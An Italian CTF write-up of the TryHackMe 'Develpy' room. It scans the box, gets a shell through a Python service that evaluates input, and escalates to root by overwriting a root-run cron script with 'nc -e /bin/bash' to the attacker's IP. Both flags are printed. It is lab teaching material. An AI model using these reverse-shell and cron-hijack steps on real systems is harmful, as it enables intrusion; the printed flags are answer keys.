Develpy CTF! (TryHackMe)

Link room: https://tryhackme.com/room/bsidesgtdevelpy
Descrizione:
boot2root machine for FIT and bsides Guatemala CTF

• user.txt
  Iniziamo subito con una scansione (tool Nmap) che rivela 2 porte aperte, SSH in esecuzione sulla porta 22 e un processo sconosciuto sulla porta 10000.

  PORT      STATE SERVICE           VERSION
  22/tcp    open  ssh               OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA)
  |   256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA)
  |_  256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519)
  10000/tcp open  snet-sensor-mgmt?
  | fingerprint-strings: 
  |   GenericLines: 
  |     Private 0days
  |     Please enther number of exploits to send??: Traceback (most recent call last):
  |     File "./exploit.py", line 6, in <module>
  |     num_exploits = int(input(' Please enther number of exploits to send??: '))
  |     File "<string>", line 0
  |     SyntaxError: unexpected EOF while parsing
  |   GetRequest: 
  |     Private 0days
  |     Please enther number of exploits to send??: Traceback (most recent call last):
  |     File "./exploit.py", line 6, in <module>
  |     num_exploits = int(input(' Please enther number of exploits to send??: '))
  |     File "<string>", line 1, in <module>
  |     NameError: name 'GET' is not defined
  |   HTTPOptions, RTSPRequest: 
  |     Private 0days
  |     Please enther number of exploits to send??: Traceback (most recent call last):
  |     File "./exploit.py", line 6, in <module>
  |     num_exploits = int(input(' Please enther number of exploits to send??: '))
  |     File "<string>", line 1, in <module>
  |     NameError: name 'OPTIONS' is not defined
  |   NULL: 
  |     Private 0days
  |_    Please enther number of exploits to send??:

  Se proviamo a connetterci nella porta 10000 il browser da un errore dove il programma nascosto si chiama exploit.py.
  Questo è l'errore:

  Please enther number of exploits to send??: Traceback (most recent call last):
    File "./exploit.py", line 6, in <module>
      num_exploits = int(input(' Please enther number of exploits to send??: '))
    File "<string>", line 1, in <module>
  NameError: name 'GET' is not defined

  Connettiamoci con telnet, lo script python richiede un numero ed esegue una sorta di ** ping dove "**" è il numero che abbiamo fornito.

  $ telnet 10.10.135.158 10000
  Trying 10.10.135.158...
  Connected to 10.10.135.158.
  Escape character is '^]'.
  
          Private 0days
  
   Please enther number of exploits to send??: 4
  
  Exploit started, attacking target (tryhackme.com)...
  Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.064 ms
  Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.032 ms
  Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.023 ms
  Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.164 ms
  Connection closed by foreign host.

  Sulla VM (del sito), il listener riceve un feedback e abbiamo una shell inversa:

  unknown@parrot:/data/vpn$ rlwrap nc -nlvp 4444
  listening on [any] 4444 ...
  connect to [10.9.0.54] from (UNKNOWN) [10.10.135.158] 38628
  SHELL=/bin/bash script -q /dev/null
  king@ubuntu:~$ 

  Apriamo il file e otteniamo la flag:

  king@ubuntu:~$ ls -la
  ls -la
  total 324
  drwxr-xr-x 4 king king   4096 Aug 27  2019 .
  drwxr-xr-x 3 root root   4096 Aug 25  2019 ..
  -rw------- 1 root root   2929 Aug 27  2019 .bash_history
  -rw-r--r-- 1 king king    220 Aug 25  2019 .bash_logout
  -rw-r--r-- 1 king king   3771 Aug 25  2019 .bashrc
  drwx------ 2 king king   4096 Aug 25  2019 .cache
  -rwxrwxrwx 1 king king 272113 Aug 27  2019 credentials.png
  -rwxrwxrwx 1 king king    408 Aug 25  2019 exploit.py
  drwxrwxr-x 2 king king   4096 Aug 25  2019 .nano
  -rw-rw-r-- 1 king king      5 Jul  2 11:25 .pid
  -rw-r--r-- 1 king king    655 Aug 25  2019 .profile
  -rw-r--r-- 1 root root     32 Aug 25  2019 root.sh
  -rw-rw-r-- 1 king king    139 Aug 25  2019 run.sh
  -rw-r--r-- 1 king king      0 Aug 25  2019 .sudo_as_admin_successful
  -rw-rw-r-- 1 king king     33 Aug 27  2019 user.txt
  -rw-r--r-- 1 root root    183 Aug 25  2019 .wget-hsts
  king@ubuntu:~$ cat user.txt
  cat user.txt
  cf85ff769cfaaa721758949bf870b019

  USER FLAG: cf85ff769cfaaa721758949bf870b019

• root.txt
  Non possiamo controllare i privilegi del "king" con sudo -l per la mancanza della password. C'è un'immagine chiamata credenziali.png ma non aiuta, proviamo a dare un occhiata a crontab:

  king@ubuntu:~$ cat /etc/crontab
  cat /etc/crontab
  # /etc/crontab: system-wide crontab
  # Unlike any other crontab you don't have to run the `crontab'
  # command to install the new version when you edit this file
  # and files in /etc/cron.d. These files also have username fields,
  # that none of the other crontabs do.
  
  SHELL=/bin/sh
  PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  
  # m h dom mon dow user  command
  17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
  25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  *  *    * * *   king    cd /home/king/ && bash run.sh
  *  *    * * *   root    cd /home/king/ && bash root.sh
  *  *    * * *   root    cd /root/company && bash run.sh
  #

  Ci sono 3 processi programmati per l'esecuzione ogni minuto, 1 dei quali eseguito da root, come una sorta di thread😂.
  Script root.sh che si trova nella home:

  king@ubuntu:~$ cat /home/king/root.sh
  python /root/company/media/*.py
  king@ubuntu:~$ ls -l /home/king/root.sh
  ls -l /home/king/root.sh
  -rw-r--r-- 1 root root 32 Aug 25  2019 /home/king/root.sh

  Ora la questione si fa molto interessante perché abbiamo uno script nella nostra home con i privilegi root! Possiamo quindi rimuoverlo e crearne uno a nostro piacimento!!!😁😁😁

  king@ubuntu:~$ cd /home/king/
  king@ubuntu:~$ rm root.sh
  king@ubuntu:~$ printf '#!/bin/bash\nnc -e /bin/bash 10.9.0.54 5555' > root.sh
  king@ubuntu:~$ chmod +x root.sh

  Ora apriamo il file!:)

  root@ubuntu:/home/king# cd /root
  cd /root
  root@ubuntu:~# ll
  ll
  total 32
  drwx------  4 root root 4096 Aug 25  2019 ./
  drwxr-xr-x 22 root root 4096 Aug 25  2019 ../
  -rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
  drwxr-xr-x  4 root root 4096 Aug 27  2019 company/
  -rw-r--r--  1 root root 1185 Nov 12  2018 .gitignore
  drwxr-xr-x  2 root root 4096 Aug 25  2019 .nano/
  -rw-r--r--  1 root root  148 Aug 17  2015 .profile
  -rw-r--r--  1 root root   33 Aug 25  2019 root.txt
  root@ubuntu:~# cat root.txt
  cat root.txt
  9c37646777a53910a347f387dce025ec

  Root flag: 9c37646777a53910a347f387dce025ec

RIASSUMENDO: